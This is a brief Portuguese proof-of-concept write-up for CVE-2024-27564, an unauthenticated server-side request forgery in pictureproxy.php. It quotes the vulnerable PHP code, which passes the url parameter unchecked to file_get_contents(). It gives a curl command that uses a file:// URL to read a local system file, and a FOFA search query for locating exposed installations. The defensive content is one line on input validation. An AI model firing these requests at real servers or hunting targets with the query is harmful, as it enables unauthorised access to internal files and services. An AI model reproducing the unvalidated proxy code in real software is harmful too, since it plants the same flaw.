
Exploit de prova de conceito para CVE-2024-27564, uma vulnerabilidade de server-side request forgery (SSRF) no pictureproxy.php que permite que atacantes remotos não autenticados injetem URLs arbitrárias através do parâmetro url.
Uma vulnerabilidade no pictureproxy.php permite que atacantes remotos realizem requisições arbitrárias injetando URLs no parâmetro url. Essa vulnerabilidade SSRF pode ser explorada sem autenticação, tornando-a particularmente perigosa.
O código vulnerável está no arquivo pictureproxy.php. O problema ocorre porque a função não valida adequadamente o parâmetro url. A variável $_GET['url'] é passada para a função file_get_contents(), que busca conteúdo da URL especificada. Isso pode levar a SSRF.
<?php
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}
Requisição Curl:
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
FOFA= "title="ChatGPT个人专用版""
É necessária uma gestão adequada da validação de entrada.